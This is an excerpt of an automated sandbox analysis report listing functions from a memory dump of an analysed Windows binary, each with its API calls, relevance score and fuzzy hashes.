Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: EnvironmentStrings$Free
String ID:
API String ID: 3328510275-0
Opcode ID: c18e4f043843f1c8c634178ac738a3b10062f82bf7080ae00b64191faa204f1e
Instruction ID: a4cd5b8b4d08e32bc5ce86133bd130949019f0890a76b60515e349a924b76de2
Opcode Fuzzy Hash: c18e4f043843f1c8c634178ac738a3b10062f82bf7080ae00b64191faa204f1e
Instruction Fuzzy Hash: 61016521E08B9582EB24BF12641506AA360AF54FE0FC84638DF7D177C9DF7CE44293A0

Function 00007FF7F1303820 Relevance: 3.0, APIs: 2, Instructions: 40timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F1303731), ref: 00007FF7F1303853
SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F1303731), ref: 00007FF7F1303869

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: Time$System$FileLocalSpecific
String ID:
API String ID: 1707611234-0
Opcode ID: c403bb63c7bc105d04eb971b31d2aa9290b9d6598bcac29245d41400541a5298
Instruction ID: 4c826cbcc0628e00f70bf4193f5b07d5fb3fd797db9e1eb59c540f42ac69d31e
Opcode Fuzzy Hash: c403bb63c7bc105d04eb971b31d2aa9290b9d6598bcac29245d41400541a5298
Instruction Fuzzy Hash: BC11A771A0C65282EB54AB15A41103BFBA0FF81775F900239F6BD819D4DFBCE118DB50

Function 00007FF7F129066C Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

GdipDisposeImage.GDIPLUS ref: 00007FF7F129068E
GdipFree.GDIPLUS ref: 00007FF7F12906A3

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: Gdip$DisposeFreeImage
String ID:
API String ID: 1950503971-0
Opcode ID: 418d43df33912bb62007a859a31320a335d0da39ff2751d50426e60a737c5a6e
Instruction ID: b6cddfa07cba10dbbc052a8e2834357185673d30533145a32b8ad4f7110a64bf
Opcode Fuzzy Hash: 418d43df33912bb62007a859a31320a335d0da39ff2751d50426e60a737c5a6e
Instruction Fuzzy Hash: 95F08231B08A0A86EB507F99F401279A224EF84B50FE48034D66D827D5DF7DE89197D4

Function 00007FF7F12FA2C4 Relevance: 3.0, APIs: 2, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7F12FA2F4

Part of subcall function 00007FF7F12FADF4: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7F12FADFD

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7F12FA2FA

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
String ID:
API String ID: 1173176844-0
Opcode ID: 1804dbf7969fb847f7d6bbf348b98602dad4ee94b6909257683e72ffbf17d083
Instruction ID: a90e520b6bd3df5992595a8c61d6241e76e2327ac34a094cef68cfc718f8a062
Opcode Fuzzy Hash: 1804dbf7969fb847f7d6bbf348b98602dad4ee94b6909257683e72ffbf17d083
Instruction Fuzzy Hash: 90E0E284F5921B06FF6836E218660B581800F59371FA81B34DE3EC82C7AFDDA49292F4

Function 00007FF7F132E1F0 Relevance: 3.0, APIs: 2, Instructions: 20COMMON

Download Yara Rule

APIs

SHGetKnownFolderPath.SHELL32 ref: 00007FF7F132E20A
wsprintfW.USER32 ref: 00007FF7F132E225

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: FolderKnownPathwsprintf
String ID:
API String ID: 2574052535-0
Opcode ID: 8c907b8bd7dbc339951842ac878295bdb8fa6fb64b683b1439e7b42c88b9d9b8
Instruction ID: aaf9e0d19c44ef764fe52288358a384b985c62c56c2ae63dca7c9cb13244e22a
Opcode Fuzzy Hash: 8c907b8bd7dbc339951842ac878295bdb8fa6fb64b683b1439e7b42c88b9d9b8
Instruction Fuzzy Hash: C1E09211A18687C3EB087B71E8165B5A330EF4A744FC0103AD62E065C4DF6DE14587A0

Function 00007FF7F131B6E0 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,?,?,00007FF7F1324076,?,?,?,00007FF7F13243F3,?,?,00000000,00007FF7F1324A8D,?,?,?,00007FF7F13249BF), ref: 00007FF7F131B6F6
GetLastError.KERNEL32(?,?,?,00007FF7F1324076,?,?,?,00007FF7F13243F3,?,?,00000000,00007FF7F1324A8D,?,?,?,00007FF7F13249BF), ref: 00007FF7F131B700

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 9876fc6d2a4fc134156fbef7c04eef940d3aed9529b01119962373d04f340db5
Instruction ID: c8837d874ea8a83a382ff8339f7242a5e5f132d5cb1d3b49bb1713f9ba2eb9a0
Opcode Fuzzy Hash: 9876fc6d2a4fc134156fbef7c04eef940d3aed9529b01119962373d04f340db5
Instruction Fuzzy Hash: D8E08C12F0824683FF087BB2589407492A19F84710FC8443CD92E872D6EFACB88242F1

Function 00007FF7F1318478 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,00007FF7F131825D,?,?,00000000,00007FF7F13183AA), ref: 00007FF7F13184E6
GetLastError.KERNEL32(?,?,?,00007FF7F131825D,?,?,00000000,00007FF7F13183AA), ref: 00007FF7F13184F0

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: a2332fd82bbc08fedd6d0a6564ab4cf9e3b0cf670c8cdb366eab35fb93ea7e46
Instruction ID: 234b2dd211d2035a35d91048f6384fca94ae52fd07bfa81cc2098af1bb98d24f
Opcode Fuzzy Hash: a2332fd82bbc08fedd6d0a6564ab4cf9e3b0cf670c8cdb366eab35fb93ea7e46
Instruction Fuzzy Hash: 85219212F0C64242FB64B726A59027D92919F447B4F96427DEA3E663C5CFECA44143A8

Function 00007FF7F129B320 Relevance: 1.6, APIs: 1, Instructions: 130networkCOMMON

Download Yara Rule

APIs

WSACloseEvent.WS2_32 ref: 00007FF7F129B4E8

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: CloseEvent
String ID:
API String ID: 2624557715-0
Opcode ID: 854c2afaaea3994ebbbe71707f3e41989a4e9c7b4e6f6ae24f423ea210e605e5
Instruction ID: 8e4d9681092c9cd9deaaa7efb228465ec06533bebaca9cb81503a4888d226df8
Opcode Fuzzy Hash: 854c2afaaea3994ebbbe71707f3e41989a4e9c7b4e6f6ae24f423ea210e605e5
Instruction Fuzzy Hash: A351B162B1964A81EF11FBA9A4106BDA294FF44B94FC40431DE6D873D6EFBCE441D3A0

Function 00007FF7F131FA48 Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F131FA70

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 26123bb6969e64c7a3de115a1960137b88b5f7710d6abc6720a2577ae4439594
Instruction ID: 8b77bec41eb2d08289bbedad3d652147131e424272f5aeef2e25d7cae09dbbc0
Opcode Fuzzy Hash: 26123bb6969e64c7a3de115a1960137b88b5f7710d6abc6720a2577ae4439594
Instruction Fuzzy Hash: F1410633D0864247FB28AB15D550279B3A4FF55BA0F954239D6AE536D0CFADE402C7A0

Function 00007FF7F13168E8 Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F131696E

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c27f298b55aa4df97cb23475eb850c6411813c1112fa70fe6c76f5fa3a8aa3c8
Instruction ID: 5cd3ba5da1df1c5c0c544657a991460d8ad69bdd17b01339410210601bce58a7
Opcode Fuzzy Hash: c27f298b55aa4df97cb23475eb850c6411813c1112fa70fe6c76f5fa3a8aa3c8
Instruction Fuzzy Hash: 9831AD62E1866687E7117B5588013BCAAA0AF40BB4F86027DD93D133D2DFFCE44183A1

Function 00007FF7F1314039 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7F1314067

Part of subcall function 00007FF7F1314160: GetModuleHandleExW.KERNEL32 ref: 00007FF7F1314185
Part of subcall function 00007FF7F1314160: GetProcAddress.KERNEL32 ref: 00007FF7F131419B
Part of subcall function 00007FF7F1314160: FreeLibrary.KERNEL32 ref: 00007FF7F13141C2

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: cc004717d8c0a6ccd53e7ef3e1a4b732e6582a66320545391c874d70e17292c2
Instruction ID: 60293441f45dcc849522579812993da9571d8bc5c6c0f2662e5f1bd9cca514bc
Opcode Fuzzy Hash: cc004717d8c0a6ccd53e7ef3e1a4b732e6582a66320545391c874d70e17292c2
Instruction Fuzzy Hash: 2421A132E147418AEB24AF64C4402EC73A0EF54728F96163DD62C16AC6DFB8D584C7A0

Function 00007FF7F12906C4 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7F12907A2

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 320b0776c3176ef96949f349dd5b4aab95e79b259ec639e1b2efcdf1feb51993
Instruction ID: b00800543e67c7db17a6c2762b31e43ad15e3fa73d2c6edf9ca37010e4d81820
Opcode Fuzzy Hash: 320b0776c3176ef96949f349dd5b4aab95e79b259ec639e1b2efcdf1feb51993
Instruction Fuzzy Hash: 8E21D721B0878585EB18BB99E0002FDA294EB44BF0FE44730DA7D83BC5DFBDD4919694

Function 00007FF7F1304804 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F1304761

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3cdfb9ce0a5c0457b3ef3c427a978d52d93ad49ba0e3567c4a8bb3e195476d21
Instruction ID: 5f3cacfa8a58bd15c7fca3fad11b9b4a0fd310e77c7be1ff60357a15bb1b043d
Opcode Fuzzy Hash: 3cdfb9ce0a5c0457b3ef3c427a978d52d93ad49ba0e3567c4a8bb3e195476d21
Instruction Fuzzy Hash: 2F118721A1C68283EB60BF51950027EE3D0AF96F88FC54039EA6D576C6DFBDD50087A1

Function 00007FF7F1311688 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F13116AB

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 9f516fca55b516629e1ebd3e3b8de4f9c110b03db62617cb41f1a81f9117a41b
Instruction ID: eb7f2afb5c658fa886943c8528f3c9b290d0ecc85b98fb4c8b5a07201477e716
Opcode Fuzzy Hash: 9f516fca55b516629e1ebd3e3b8de4f9c110b03db62617cb41f1a81f9117a41b
Instruction Fuzzy Hash: 9421F632A1868287DB61AF28D4403B9F7A0EF84B74F990338EA6D476D9DF7DD4008B50

Function 00007FF7F131174C Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F131176F

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 736d27e5f6f85f456b3b0f46417341afd108be59949c5512090cfb983ef0a459
Instruction ID: 2e8f90383aa006b8d63958bcd927be6e7fd62e893bc8a70983391b78b4dc97fd
Opcode Fuzzy Hash: 736d27e5f6f85f456b3b0f46417341afd108be59949c5512090cfb983ef0a459
Instruction Fuzzy Hash: 19218332A1864687EB61AF28D4403B9B6A0EF84B64F954238EA6D476DADF7DD4008B50

Function 00007FF7F1304674 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F130469C

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 5b40e31a6964f7c3688eaac2442c398391239fe2d98abcc32e069a12843e2109
Instruction ID: ab92410ecd3e9cb3c6be1eac50b446f07090c80f600c4b32b4bce64626db54d0
Opcode Fuzzy Hash: 5b40e31a6964f7c3688eaac2442c398391239fe2d98abcc32e069a12843e2109
Instruction Fuzzy Hash: 4711B721A0C58683FB51BE1598003BED3D0AF51B58F994038EA6C076C6EFACD5408BA0

Function 00007FF7F130A9F4 Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F130AA48

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c901e11cd3a04162a8545ce054cc31de5e669d2950fe626c252d57100ff7a241
Instruction ID: cd84b4d462874ab02e65dda006ec73d7e46aac563d399e1dfa994d3c6abef08a
Opcode Fuzzy Hash: c901e11cd3a04162a8545ce054cc31de5e669d2950fe626c252d57100ff7a241
Instruction Fuzzy Hash: AE01A92260874282E704EB52A900069E7D4AF95FE4F884635EE7D13BD6DFBCD5414750

Function 00007FF7F12B88E0 Relevance: 1.5, APIs: 1, Instructions: 46networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FF7F12B8933

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: socket
String ID:
API String ID: 98920635-0
Opcode ID: 3f78bb51c2191dd91f293403c47e799a31c2c42317fa876c53d3bdb169312a77
Instruction ID: eec7514b9a49ab99942700f735aed855448b63d64abfb97c8dc8da6e4746a561
Opcode Fuzzy Hash: 3f78bb51c2191dd91f293403c47e799a31c2c42317fa876c53d3bdb169312a77
Instruction Fuzzy Hash: 8D119832B04A8182DB14DF56E18426DB3A1FB48BA4F848235DBBD477C5CF38E891C741

Function 00007FF7F1330628 Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32 ref: 00007FF7F1330658

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 1553de1249c1a1ff8e29a209769580f7014b2d7bf6379c82235c465a64067054
Instruction ID: 2d165acbba4880037e8b8057dc3be355be4c27b5acf8bca332bd7a92ebaf23eb
Opcode Fuzzy Hash: 1553de1249c1a1ff8e29a209769580f7014b2d7bf6379c82235c465a64067054
Instruction Fuzzy Hash: 69018E33A18B4183E714AF20E45079AA3A0FBD5764FA05335DAB943AC9DFBDD194CA80

Function 00007FF7F1330C3C Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32 ref: 00007FF7F1330C6C

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: a729698e199a3d6a8569ae65cd16fba472315f57ecd68b40bd0020739fcecc4a
Instruction ID: 9da77373354a701610db63eab6d65a906a470d256b4157f237f9232a26f1c366
Opcode Fuzzy Hash: a729698e199a3d6a8569ae65cd16fba472315f57ecd68b40bd0020739fcecc4a
Instruction Fuzzy Hash: 11018E32A1874583E7109F20F84075AB3A0FB91760F905335DAB946AC8DFBDD194CA40

Function 00007FF7F12A3C60 Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

